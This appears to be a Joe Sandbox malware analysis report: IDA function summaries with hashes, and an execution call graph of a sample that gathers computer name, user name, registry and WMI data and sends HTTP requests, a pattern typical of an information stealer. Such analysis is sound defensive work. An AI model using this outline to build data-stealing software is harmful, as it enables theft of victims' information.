                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 83c3c2b60c30a8a8427aadcd73807ef779d94fdd05f10e9dc81c9a29dc356940
                                                                                                                                                                                                                                                                  • Instruction ID: 703044390d90cb3e6390260452ee36f7ac39c5f05c3506393a656b69a1cf706f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83c3c2b60c30a8a8427aadcd73807ef779d94fdd05f10e9dc81c9a29dc356940
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31B1D174A04649AFDB65CF98C880FBEBBB2EF46310F14815DE501AB391CB749D42CBA5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067DF17
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067DFA8
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067E028
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate
                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                  • API String ID: 2268201637-1018135373
                                                                                                                                                                                                                                                                  • Opcode ID: fde01c3c55d623d44d8b6ddb0adc52e93bfc7efcdb9d9a91046ffa56e081aa08
                                                                                                                                                                                                                                                                  • Instruction ID: 721293684e073f90ebb145442635e39f63cc909eac4ae7a5dc1078527d8b5718
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fde01c3c55d623d44d8b6ddb0adc52e93bfc7efcdb9d9a91046ffa56e081aa08
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5941E634900209EBCF10EF68CC41AEEBBB7AF45314F54C499F8196B392D7359A16CB95
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00688A7C), ref: 00688C77
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00688A7C), ref: 00688C81
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00688CA9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                  • Opcode ID: 3faa8eed6b75dd5ddd2344d6a55a3a6d836dafc006095d15bd371821626c6e2e
                                                                                                                                                                                                                                                                  • Instruction ID: 745a30cb719f0d6ba0b5fa26a8c0b5d99aa7cd54afbc53554e44200e9b3ba64d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3faa8eed6b75dd5ddd2344d6a55a3a6d836dafc006095d15bd371821626c6e2e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69E04F30286609BFEF142B60EC06B993A56AB11B41F908421F90DEA1F4EB65D910D698
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(763EDE73), ref: 006C5850
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006C5AAB
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006C5AF3
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006C5B96
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                  • Opcode ID: 46bf9633e610a6876a297d5fb7c737506220d132911f6ab8d0bedecac1921f58
                                                                                                                                                                                                                                                                  • Instruction ID: 44dec558d084e42f8f0e93262eb833ddc9fa14eb9f9bcae2b0934812e542c69d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46bf9633e610a6876a297d5fb7c737506220d132911f6ab8d0bedecac1921f58
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74D16975E006589FCB15CFA8C890AEDBBB6FF09310F18856EE816EB351D730A981CB54
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 006D17E8
                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006D1820
                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006D1840
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3328510275-0
                                                                                                                                                                                                                                                                  • Opcode ID: b7cc9a7a8fc5bd89d6a058c69038b51c8a779688f27ae12f55f028318b4224fb
                                                                                                                                                                                                                                                                  • Instruction ID: b136d2f007d68b168f1be343ae0ae30f5633bcc4672b96825f3d7fa77358d76d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7cc9a7a8fc5bd89d6a058c69038b51c8a779688f27ae12f55f028318b4224fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D1104F5E051197EA71567759C8ECAF6A6EDF8B3A4B10442AF40299300EBA4CD01D1F9
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 006C8A48
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 006C8A55
                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 006C8A7B
                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 006C8AA1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FilePointer$ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 142388799-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006E16AF
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006E16BB
                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 006E16CB
                                                                                                                                                                                                                                                                    • Part of subcall function 006E1749: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006E16D0), ref: 006E175C
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006E16DF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3431868840-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006E17C8
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006E17D4
                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 006E17E4
                                                                                                                                                                                                                                                                    • Part of subcall function 006E1749: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006E16D0), ref: 006E175C
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006E17F9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3431868840-0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • GetXStateFeaturesMask, xrefs: 006C44D6
                                                                                                                                                                                                                                                                  • InitializeCriticalSectionEx, xrefs: 006C4526
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
                                                                                                                                                                                                                                                                  • API String ID: 0-4196971266
                                                                                                                                                                                                                                                                  • Opcode ID: 89d3e8a8918e1faceaf847242332350efff7b95e612ed61a6ab0be13f0f5c559
                                                                                                                                                                                                                                                                  • Instruction ID: 3be4bf30f109a259ed695757ab8ecf4e42ce71aacc616097dde6330395bf234b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89d3e8a8918e1faceaf847242332350efff7b95e612ed61a6ab0be13f0f5c559
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A018F3668022CB7CB212B91AC06FAE7E17DF41B61F418016FE1D262A0DEB15921D6D8

Execution Graph

Execution Coverage: 4.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 26
API calls 81860->81861 81862 403e0b 81861->81862 81863 40fa28 lstrcpy 81862->81863 81864 403e18 81863->81864 81865 40fae3 4 API calls 81864->81865 81866 403e35 81865->81866 81867 40fa28 lstrcpy 81866->81867 81868 403e42 81867->81868 81869 40fae3 4 API calls 81868->81869 81870 403e60 81869->81870 81871 40fa28 lstrcpy 81870->81871 81872 403e6d 81871->81872 81873 40fae3 4 API calls 81872->81873 81874 403e8a 81873->81874 81875 40fa28 lstrcpy 81874->81875 81876 403e97 81875->81876 81877 40fae3 4 API calls 81876->81877 81878 403eb4 81877->81878 81879 40fa28 lstrcpy 81878->81879 81880 403ec1 81879->81880 81881 40fa6f 3 API calls 81880->81881 81882 403edd 81881->81882 81883 40fa28 lstrcpy 81882->81883 81884 403eea 81883->81884 81885 40fae3 4 API calls 81884->81885 81886 403f07 81885->81886 81887 40fa28 lstrcpy 81886->81887 81888 403f14 81887->81888 81889 40fae3 4 API calls 81888->81889 81890 403f31 81889->81890 81891 40fa28 lstrcpy 81890->81891 81892 403f3e 81891->81892 81893 40fa6f 3 API calls 81892->81893 81894 403f5a 81893->81894 81895 40fa28 lstrcpy 81894->81895 81896 403f67 81895->81896 81897 40fae3 4 API calls 81896->81897 81898 403f84 81897->81898 81899 40fa28 lstrcpy 81898->81899 81900 403f91 81899->81900 81901 40fae3 4 API calls 81900->81901 81902 403faf 81901->81902 81903 40fa28 lstrcpy 81902->81903 81904 403fbc 81903->81904 81905 40fae3 4 API calls 81904->81905 81906 403fd9 81905->81906 81907 40fa28 lstrcpy 81906->81907 81908 403fe6 81907->81908 81909 40fae3 4 API calls 81908->81909 81910 404003 81909->81910 81911 40fa28 lstrcpy 81910->81911 81912 404010 81911->81912 81913 40fa6f 3 API calls 81912->81913 81914 40402c 81913->81914 81915 40fa28 lstrcpy 81914->81915 81916 404039 81915->81916 81917 40f96a lstrcpy 81916->81917 81918 404052 81917->81918 81919 40fa6f 3 API calls 81918->81919 81920 404066 81919->81920 81921 40fa6f 3 API calls 81920->81921 81922 404079 81921->81922 81923 40fa28 lstrcpy 81922->81923 81924 404086 81923->81924 81925 4040a6 lstrlenA 
81924->81925 81926 4040b6 81925->81926 81927 4040bf lstrlenA 81926->81927 82821 40fb94 81927->82821 81929 4040cf HttpSendRequestA 81930 404118 InternetReadFile 81929->81930 81931 40412f InternetCloseHandle 81930->81931 81934 4040de 81930->81934 82822 40f9d5 81931->82822 81933 40fae3 4 API calls 81933->81934 81934->81930 81934->81931 81934->81933 81935 40fa28 lstrcpy 81934->81935 81935->81934 82826 40fb94 81936->82826 81938 411ce4 StrCmpCA 81939 411cf6 81938->81939 81940 411cef ExitProcess 81938->81940 81941 411d06 strtok_s 81939->81941 81942 411e53 81941->81942 81943 411d17 81941->81943 81942->80898 81944 411e38 strtok_s 81943->81944 81945 411d83 StrCmpCA 81943->81945 81946 411dc2 StrCmpCA 81943->81946 81947 411e02 StrCmpCA 81943->81947 81948 411e24 StrCmpCA 81943->81948 81949 411d67 StrCmpCA 81943->81949 81950 411dd7 StrCmpCA 81943->81950 81951 411d4b StrCmpCA 81943->81951 81952 411dad StrCmpCA 81943->81952 81953 411dec StrCmpCA 81943->81953 81954 411d2f StrCmpCA 81943->81954 81955 40f9de 2 API calls 81943->81955 81944->81942 81944->81943 81945->81943 81945->81944 81946->81943 81946->81944 81947->81944 81948->81944 81949->81943 81949->81944 81950->81943 81950->81944 81951->81943 81951->81944 81952->81943 81952->81944 81953->81944 81954->81943 81954->81944 81955->81943 81957 40f9a1 lstrcpy 81956->81957 81958 4051ba 81957->81958 81959 403a7d 6 API calls 81958->81959 81960 4051c6 81959->81960 81961 40f96a lstrcpy 81960->81961 81962 4051e3 81961->81962 81963 40f96a lstrcpy 81962->81963 81964 4051f6 81963->81964 81965 40f96a lstrcpy 81964->81965 81966 405207 81965->81966 81967 40f96a lstrcpy 81966->81967 81968 405218 81967->81968 81969 40f96a lstrcpy 81968->81969 81970 405229 81969->81970 81971 405239 InternetOpenA StrCmpCA 81970->81971 81972 40525b 81971->81972 81973 40592b InternetCloseHandle 81972->81973 81974 410b42 3 API calls 81972->81974 81975 405946 81973->81975 81976 405271 81974->81976 82833 406295 CryptStringToBinaryA 81975->82833 81977 40fa6f 3 API calls 
81976->81977 81979 405284 81977->81979 81981 40fa28 lstrcpy 81979->81981 81986 405291 81981->81986 81982 40f9de 2 API calls 81984 40595f 81982->81984 81983 405979 81995 401061 _EH_prolog 81983->81995 81985 40fae3 4 API calls 81984->81985 81987 40596d 81985->81987 81989 40fae3 4 API calls 81986->81989 81988 40fa28 lstrcpy 81987->81988 81988->81983 81990 4052ba 81989->81990 81991 40fa28 lstrcpy 81990->81991 81992 4052c7 81991->81992 81993 40fae3 4 API calls 81992->81993 81994 4052e4 81993->81994 81997 40fa28 lstrcpy 81994->81997 81996 4059d7 81995->81996 81996->80904 81998 4052f1 81997->81998 81999 40fa6f 3 API calls 81998->81999 82000 40530d 81999->82000 82001 40fa28 lstrcpy 82000->82001 82002 40531a 82001->82002 82003 40fae3 4 API calls 82002->82003 82004 405337 82003->82004 82005 40fa28 lstrcpy 82004->82005 82006 405344 82005->82006 82007 40fae3 4 API calls 82006->82007 82008 405361 82007->82008 82009 40fa28 lstrcpy 82008->82009 82010 40536e 82009->82010 82011 40fae3 4 API calls 82010->82011 82012 40538c 82011->82012 82013 40fa6f 3 API calls 82012->82013 82014 40539f 82013->82014 82015 40fa28 lstrcpy 82014->82015 82016 4053ac 82015->82016 82017 4053c4 InternetConnectA 82016->82017 82017->81973 82018 4053ea HttpOpenRequestA 82017->82018 82019 405421 82018->82019 82020 405922 InternetCloseHandle 82018->82020 82021 405425 InternetSetOptionA 82019->82021 82022 40543b 82019->82022 82020->81973 82021->82022 82023 40fae3 4 API calls 82022->82023 82024 40544c 82023->82024 82025 40fa28 lstrcpy 82024->82025 82026 405459 82025->82026 82027 40fa6f 3 API calls 82026->82027 82028 405475 82027->82028 82029 40fa28 lstrcpy 82028->82029 82030 405482 82029->82030 82031 40fae3 4 API calls 82030->82031 82032 40549f 82031->82032 82033 40fa28 lstrcpy 82032->82033 82034 4054ac 82033->82034 82035 40fae3 4 API calls 82034->82035 82036 4054ca 82035->82036 82037 40fa28 lstrcpy 82036->82037 82038 4054d7 82037->82038 82039 40fae3 4 API calls 82038->82039 82040 4054f5 82039->82040 82041 40fa28 
lstrcpy 82040->82041 82042 405502 82041->82042 82043 40fae3 4 API calls 82042->82043 82044 40551f 82043->82044 82045 40fa28 lstrcpy 82044->82045 82046 40552c 82045->82046 82047 40fa6f 3 API calls 82046->82047 82048 405548 82047->82048 82049 40fa28 lstrcpy 82048->82049 82050 405555 82049->82050 82051 40fae3 4 API calls 82050->82051 82052 405572 82051->82052 82053 40fa28 lstrcpy 82052->82053 82054 40557f 82053->82054 82055 40fae3 4 API calls 82054->82055 82056 40559c 82055->82056 82057 40fa28 lstrcpy 82056->82057 82058 4055a9 82057->82058 82059 40fa6f 3 API calls 82058->82059 82060 4055c5 82059->82060 82061 40fa28 lstrcpy 82060->82061 82062 4055d2 82061->82062 82063 40fae3 4 API calls 82062->82063 82064 4055ef 82063->82064 82065 40fa28 lstrcpy 82064->82065 82066 4055fc 82065->82066 82067 40fae3 4 API calls 82066->82067 82068 40561a 82067->82068 82069 40fa28 lstrcpy 82068->82069 82070 405627 82069->82070 82071 40fae3 4 API calls 82070->82071 82072 405644 82071->82072 82073 40fa28 lstrcpy 82072->82073 82074 405651 82073->82074 82075 40fae3 4 API calls 82074->82075 82076 40566e 82075->82076 82077 40fa28 lstrcpy 82076->82077 82078 40567b 82077->82078 82079 402107 lstrcpy 82078->82079 82080 405690 82079->82080 82081 40fa6f 3 API calls 82080->82081 82082 4056a2 82081->82082 82083 40fa28 lstrcpy 82082->82083 82084 4056af 82083->82084 82085 40fae3 4 API calls 82084->82085 82086 4056d8 82085->82086 82087 40fa28 lstrcpy 82086->82087 82088 4056e5 82087->82088 82089 40fae3 4 API calls 82088->82089 82090 405702 82089->82090 82091 40fa28 lstrcpy 82090->82091 82092 40570f 82091->82092 82093 40fa6f 3 API calls 82092->82093 82094 40572b 82093->82094 82095 40fa28 lstrcpy 82094->82095 82096 405738 82095->82096 82097 40fae3 4 API calls 82096->82097 82098 405755 82097->82098 82099 40fa28 lstrcpy 82098->82099 82100 405762 82099->82100 82101 40fae3 4 API calls 82100->82101 82102 405780 82101->82102 82103 40fa28 lstrcpy 82102->82103 82104 40578d 82103->82104 82105 40fae3 4 API calls 
82104->82105 82106 4057aa 82105->82106 82107 40fa28 lstrcpy 82106->82107 82108 4057b7 82107->82108 82109 40fae3 4 API calls 82108->82109 82110 4057d4 82109->82110 82111 40fa28 lstrcpy 82110->82111 82112 4057e1 82111->82112 82113 40fa6f 3 API calls 82112->82113 82114 4057fd 82113->82114 82115 40fa28 lstrcpy 82114->82115 82116 40580a 82115->82116 82117 40581e lstrlenA 82116->82117 82827 40fb94 82117->82827 82119 40582f lstrlenA GetProcessHeap HeapAlloc 82828 40fb94 82119->82828 82121 405851 lstrlenA 82829 40fb94 82121->82829 82123 405861 memcpy 82830 40fb94 82123->82830 82125 405873 lstrlenA 82126 405883 82125->82126 82127 40588c lstrlenA memcpy 82126->82127 82831 40fb94 82127->82831 82129 4058a8 lstrlenA 82832 40fb94 82129->82832 82131 4058b8 HttpSendRequestA 82132 405904 InternetReadFile 82131->82132 82133 40591b InternetCloseHandle 82132->82133 82135 4058ca 82132->82135 82133->82020 82134 40fae3 4 API calls 82134->82135 82135->82132 82135->82133 82135->82134 82136 40fa28 lstrcpy 82135->82136 82136->82135 82838 40fb94 82137->82838 82139 411726 strtok_s 82140 411733 82139->82140 82144 41178f 82139->82144 82141 411778 strtok_s 82140->82141 82142 40f9de 2 API calls 82140->82142 82143 40f9de 2 API calls 82140->82143 82141->82140 82141->82144 82142->82141 82143->82140 82144->80906 82839 40fb94 82145->82839 82147 411503 strtok_s 82148 411614 82147->82148 82150 411514 82147->82150 82148->80914 82149 4115c5 StrCmpCA 82149->82150 82150->82149 82151 40f9de 2 API calls 82150->82151 82152 4115f7 strtok_s 82150->82152 82153 411594 StrCmpCA 82150->82153 82154 41156f StrCmpCA 82150->82154 82155 411541 StrCmpCA 82150->82155 82151->82152 82152->82148 82152->82150 82153->82150 82154->82150 82155->82150 82840 40fb94 82156->82840 82158 41165a strtok_s 82159 4116e0 82158->82159 82163 411667 82158->82163 82159->80922 82160 40f9de 2 API calls 82162 4116c9 strtok_s 82160->82162 82161 411691 StrCmpCA 82161->82163 82162->82159 82162->82163 82163->82160 82163->82161 82163->82162 82164 40f9de 
2 API calls 82163->82164 82164->82163 82166 40f96a lstrcpy 82165->82166 82167 414708 82166->82167 82168 40fae3 4 API calls 82167->82168 82169 41471d 82168->82169 82170 40fa28 lstrcpy 82169->82170 82171 41472a 82170->82171 82841 4020ed 82171->82841 82174 40fa6f 3 API calls 82175 414751 82174->82175 82176 40fa28 lstrcpy 82175->82176 82177 41475e 82176->82177 82178 40fae3 4 API calls 82177->82178 82179 414787 82178->82179 82180 40fa28 lstrcpy 82179->82180 82181 414794 82180->82181 82182 40fae3 4 API calls 82181->82182 82183 4147b1 82182->82183 82184 40fa28 lstrcpy 82183->82184 82185 4147be 82184->82185 82186 40fae3 4 API calls 82185->82186 82187 4147db 82186->82187 82188 40fa28 lstrcpy 82187->82188 82189 4147e8 82188->82189 82844 40fc7f GetProcessHeap HeapAlloc GetLocalTime wsprintfA 82189->82844 82191 4147f9 82192 40fae3 4 API calls 82191->82192 82193 414806 82192->82193 82194 40fa28 lstrcpy 82193->82194 82195 414813 82194->82195 82196 40fae3 4 API calls 82195->82196 82197 414830 82196->82197 82198 40fa28 lstrcpy 82197->82198 82199 41483d 82198->82199 82200 40fae3 4 API calls 82199->82200 82201 41485a 82200->82201 82202 40fa28 lstrcpy 82201->82202 82203 414867 82202->82203 82845 41045d memset RegOpenKeyExA 82203->82845 82205 414878 82206 40fae3 4 API calls 82205->82206 82207 414885 82206->82207 82208 40fa28 lstrcpy 82207->82208 82209 414892 82208->82209 82210 40fae3 4 API calls 82209->82210 82211 4148af 82210->82211 82212 40fa28 lstrcpy 82211->82212 82213 4148bc 82212->82213 82214 40fae3 4 API calls 82213->82214 82215 4148d9 82214->82215 82216 40fa28 lstrcpy 82215->82216 82217 4148e6 82216->82217 82218 4104ea 2 API calls 82217->82218 82219 4148fb 82218->82219 82220 40fa6f 3 API calls 82219->82220 82221 41490d 82220->82221 82222 40fa28 lstrcpy 82221->82222 82223 41491a 82222->82223 82224 40fae3 4 API calls 82223->82224 82225 414943 82224->82225 82226 40fa28 lstrcpy 82225->82226 82227 414950 82226->82227 82228 40fae3 4 API calls 82227->82228 82229 41496d 82228->82229 
82230 40fa28 lstrcpy 82229->82230 82231 41497a 82230->82231 82232 410525 13 API calls 82231->82232 82233 41498f 82232->82233 82234 40fa6f 3 API calls 82233->82234 82235 4149a1 82234->82235 82236 40fa28 lstrcpy 82235->82236 82237 4149ae 82236->82237 82238 40fae3 4 API calls 82237->82238 82239 4149d7 82238->82239 82240 40fa28 lstrcpy 82239->82240 82241 4149e4 82240->82241 82242 40fae3 4 API calls 82241->82242 82243 414a01 82242->82243 82244 40fa28 lstrcpy 82243->82244 82245 414a0e 82244->82245 82246 414a1a GetCurrentProcessId 82245->82246 82849 410fe7 OpenProcess 82246->82849 82249 40fa6f 3 API calls 82250 414a3d 82249->82250 82251 40fa28 lstrcpy 82250->82251 82252 414a4a 82251->82252 82253 40fae3 4 API calls 82252->82253 82254 414a73 82253->82254 82255 40fa28 lstrcpy 82254->82255 82256 414a80 82255->82256 82257 40fae3 4 API calls 82256->82257 82258 414a9d 82257->82258 82259 40fa28 lstrcpy 82258->82259 82260 414aaa 82259->82260 82261 40fae3 4 API calls 82260->82261 82262 414ac7 82261->82262 82263 40fa28 lstrcpy 82262->82263 82264 414ad4 82263->82264 82265 40fae3 4 API calls 82264->82265 82266 414af1 82265->82266 82267 40fa28 lstrcpy 82266->82267 82268 414afe 82267->82268 82854 410693 GetProcessHeap HeapAlloc 82268->82854 82271 40fae3 4 API calls 82272 414b1c 82271->82272 82273 40fa28 lstrcpy 82272->82273 82274 414b29 82273->82274 82275 40fae3 4 API calls 82274->82275 82276 414b46 82275->82276 82277 40fa28 lstrcpy 82276->82277 82278 414b53 82277->82278 82279 40fae3 4 API calls 82278->82279 82280 414b70 82279->82280 82281 40fa28 lstrcpy 82280->82281 82282 414b7d 82281->82282 82860 4107a6 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 82282->82860 82285 40fa6f 3 API calls 82286 414ba4 82285->82286 82287 40fa28 lstrcpy 82286->82287 82288 414bb1 82287->82288 82289 40fae3 4 API calls 82288->82289 82290 414bda 82289->82290 82291 40fa28 lstrcpy 82290->82291 82292 414be7 82291->82292 82293 40fae3 4 API calls 82292->82293 82294 414c04 82293->82294 82295 40fa28 
lstrcpy 82294->82295 82296 414c11 82295->82296 82874 41092f _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 82296->82874 82299 40fa6f 3 API calls 82300 414c38 82299->82300 82301 40fa28 lstrcpy 82300->82301 82302 414c45 82301->82302 82303 40fae3 4 API calls 82302->82303 82304 414c6e 82303->82304 82305 40fa28 lstrcpy 82304->82305 82306 414c7b 82305->82306 82307 40fae3 4 API calls 82306->82307 82308 414c98 82307->82308 82309 40fa28 lstrcpy 82308->82309 82310 414ca5 82309->82310 82888 40fc44 GetProcessHeap HeapAlloc GetComputerNameA 82310->82888 82313 40fae3 4 API calls 82314 414cc3 82313->82314 82315 40fa28 lstrcpy 82314->82315 82316 414cd0 82315->82316 82317 40fae3 4 API calls 82316->82317 82318 414ced 82317->82318 82319 40fa28 lstrcpy 82318->82319 82320 414cfa 82319->82320 82321 40fae3 4 API calls 82320->82321 82322 414d17 82321->82322 82323 40fa28 lstrcpy 82322->82323 82324 414d24 82323->82324 82890 40fc12 GetProcessHeap HeapAlloc GetUserNameA 82324->82890 82326 414d35 82327 40fae3 4 API calls 82326->82327 82328 414d42 82327->82328 82329 40fa28 lstrcpy 82328->82329 82330 414d4f 82329->82330 82331 40fae3 4 API calls 82330->82331 82332 414d6c 82331->82332 82333 40fa28 lstrcpy 82332->82333 82334 414d79 82333->82334 82335 40fae3 4 API calls 82334->82335 82336 414d96 82335->82336 82337 40fa28 lstrcpy 82336->82337 82338 414da3 82337->82338 82891 4103e8 7 API calls 82338->82891 82341 40fa6f 3 API calls 82342 414dca 82341->82342 82343 40fa28 lstrcpy 82342->82343 82344 414dd7 82343->82344 82345 40fae3 4 API calls 82344->82345 82346 414e00 82345->82346 82347 40fa28 lstrcpy 82346->82347 82348 414e0d 82347->82348 82349 40fae3 4 API calls 82348->82349 82350 414e2a 82349->82350 82351 40fa28 lstrcpy 82350->82351 82352 414e37 82351->82352 82894 40fd2c _EH_prolog 82352->82894 82355 40fa6f 3 API calls 82356 414e61 82355->82356 82357 40fa28 lstrcpy 82356->82357 82358 414e6e 82357->82358 82359 40fae3 4 API calls 82358->82359 82360 414e9d 82359->82360 82361 40fa28 
